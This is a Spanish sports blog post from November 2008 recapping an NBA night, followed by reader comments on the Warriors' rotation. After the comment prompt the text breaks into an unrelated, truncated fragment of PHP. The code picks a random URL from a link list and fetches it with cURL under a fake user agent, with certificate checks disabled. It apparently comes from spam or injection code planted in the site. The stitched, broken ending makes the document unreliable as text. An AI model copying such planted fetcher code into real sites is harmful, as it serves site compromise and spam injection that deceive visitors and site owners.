La Crónica (18/11/2008)

19 de November de 2008 por TheDeerHunter

Noticias fresquitas acerca de la jornada que hace no mucho acaba de terminar.

Los equipos punteros siguen como una moto. Los Cavs de Lebron James, que con los 31 de anoche es el jugador más joven que alcanza los 11.000 puntos, siguen a lo suyo y sumaron una nueva victoria frente a los New Jersey Nets. Pau Gasol por su parte se dio un festín contra Chicago alcanzando los 34 y los Celtics no necesitaron a “Big Ticket” para salir airosos de su delicado partido en New York. Dentro de este grupo habrá que empezar a contar con Denver, que se deshizo de los Bucks con un demoledor Kleiza saliendo desde el banquillo y Orlando, que hicieron lo propio contra unos Raptors sin Calderón.

Sin embargo, Atlanta Hawks han entrado en barrena desde la lesión de Josh Smith y anoche palmaron contra unos Pacers en los que destacó Danny Granger con 34 puntos y casi un 75% de acierto en el tiro. Al Horford se retiró lesionado a los 5 minutos de juego aunque parece que no tendrá problemas para jugar el próximo partido.

Con respecto al resto de españoles que también jugaron anoche, los Grizzlies de Marc ganaron a los Kings con una corta pero eficaz actuación del de Sant Boi pero Portland no pudo contra el extraordinario nuevo modelo de juego de aleros de Don Nelson. Oden no tuvo oposición en el juego interior y Rudy, como Sergio, hizo un gran partido, pero los titulares, a excepción de Roy no aportaron lo que suele ser habitual en ellos ni en ataque ni en defensa. Por parte de Golden State otra extraordinaria actuación de A. Morrow.

Por último, Dallas se deshizo con facilidad de los Bobcats y Miami de los Wizards.

Conclusiones

– Algo ha cambiado para bien en Denver. De entrada, su defensa está siendo eficaz este año. Además de esto, el reparto de los tiros está siendo radicalmente distinto a antaño. Anoche, hasta 9 jugadores lanzaron entre 5 y 10 tiros a canasta con buenos porcentajes de tiro.

– El sistema de shoot&run con 4 aleros bajos y un pívot va a tener que ser pronto objeto de estudio. De entrada, ya tiene guasa que Baron Davis pueda llegar a tener envídia de Morrow por las fiestas de juego que éste se pega.

– Por primera ocasión en la temporada Sergio juega más minutos que Blake y, lógicamente, produce más que él. Nos alegramos por Sergio por empezar a revertir su situación, pero tendrá que trabajar mucho más para ser realmente eficaz en ataque.

– Las vacaciones de Larry Brown en Charlotte… bien ¿no?

Premios:

MVP: Grandes actuaciones de Lebrón, de Pau, de Nowitzki… sin embargo se nos antoja más importante para su equipo y de más mérito la que hizo Granger contra los Hawks.

El Rookie: Qué buena pinta tiene Anthony Morrow. ¿Believe?

La sorpresa: 25 puntos de Kleiza desde el banco en unos Nuggets jugando realmente bien en todos los aspectos.

La decepción: 3 puntejos para Jamal Crawford parecen poquitos.

El mayor esfuerzo en vano: Chris Bosh, 40ptos, 18rebs, 4asis  tocándole la cara a Dwight Howard. Debe de ser duro perder después de hacer una así.

Pregunta del día: Si Monta Ellis volviera hoy mismo ¿a quien sentaríais de los Warriors?

Comenta

11 comentarios a esta entrada

  1. Noelinho dice:
    #1

    Otro dato. JJ Redick titular por primera vez en su carrera y jugando más de 30 minutos debido a la lesión de Pietrus. Alguien me lo explica? de la nada a esto? Es una manera de ponerlo en el escaparate?

    Ah, y no jugó mal.

      Citar

  2. Txusma dice:
    #2

    Que buena pregunta! Aunq para mi es claro que ha de ser Anthony Morrow el sacrificado. Es un anotador puro que desde el banco puede hacer mucho daño.

      Citar

  3. TheDeerHunter dice:
    #3

    Sí, bueno… has contestado rápido a la pregunta, Txusma y creo que el 99,9% del mundo la hubiera contestado igual de rápido y en el mismo sentido que tú.

    Supongo que en cierto modo es la mejor respuesta pero, sólo imaginando la cuchillada trapera y la cortada de bola que supondría para Morrow ser “el sacrificado” para el siguiente partido, la decisión a mí me plantearía un dilema moral terrible.

      Citar

  4. Txusma dice:
    #4

    Dilema moral? Desde cuando los entrenadores y las franquicias NBA tienen dilemas morales? Fijate en el caso de JJ Redick por ejemplo. Ha pasado de jugar 0 minutos aproximadamente a jugar 30 y al siguiente, en cuanto se recupere Pietrus jugará de nuevo los minutos de la basura. No existen los dilemas morales en la NBA, creo yo.

      Citar

  5. TheDeerHunter dice:
    #5

    Eso ya lo sé…

    La cuestión es lo que haríais cada uno de vosotros.

      Citar

  6. Fernando dice:
    #6

    Por fin una buena noche para Sergio, la verdad es que se merecía destacar al menos en un partido tras todo el trabajo en la sombra que ha realizado. Pau ha estado excepcional y Marc cada día tiene más protagonismo en el ataque de los Grizzlies. Lo único negativo es los pocos balones que le dan a Rudy en ataque. Esperemos que Sergio mantenga sus minutos ya que con él como base seguro que tiene más protagonismo que con Blake, que no le pasa una.

      Citar

  7. Fernando dice:
    #7

    Por cierto muy buena vuestra página, jamás la había visitado y está francamente bien. La pondré de link en nuestro blog del programa de radio Alley Oop

      Citar

  8. Jabho dice:
    #8

    A quien quitaria para meter en el equipo a Monta??? Si está bien a cualquiera de los otros menos a Biedrins.

    Que siga por este camino Sergio que es el bueno.

    La clave de los Hawks es Horford. JJ juega bien siempre y que esten mejor o peor depende de Horford. Es su termometro. Con el bien equilibran las zonas, con el mal son un desastre.

    Bien, bien pinta el nuevo Denver. Kleiza es muuu bueno.

    Y mucho mejor los Celtics.

      Citar

  9. Jabho dice:
    #9

    Por cierto, gracias Fernando por tu comentario. Esperamos seguir viéndote mucho por aqui. Bienvenido.

      Citar

  10. Dantley dice:
    #10

    Un saludo Fernando.

    Yo sentaría a … Ellis. Tiene que pagar por su imprudencia. Aunque tampoco vería mal sentar a Maggette. Eso sí, al final creo que lo que hará Nelson es totalmente aleatorio y variará según el partido.

      Citar

  11. Txusma dice:
    #11

    Creo q 3 meses de suspension de sueldo ya es suficiente castigo no? O luego cuando este sano, le mantenemos en el banquillo?
    Lo de Maggette tb es buena opcion ya que podria salir como sexto hombre. Si no me imagino a Nelson jugando con Ellis, Morrow, Jackson, Maggette, Biedrins y Maggette jugando de 4 en defensa es la madre de todas las madres.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>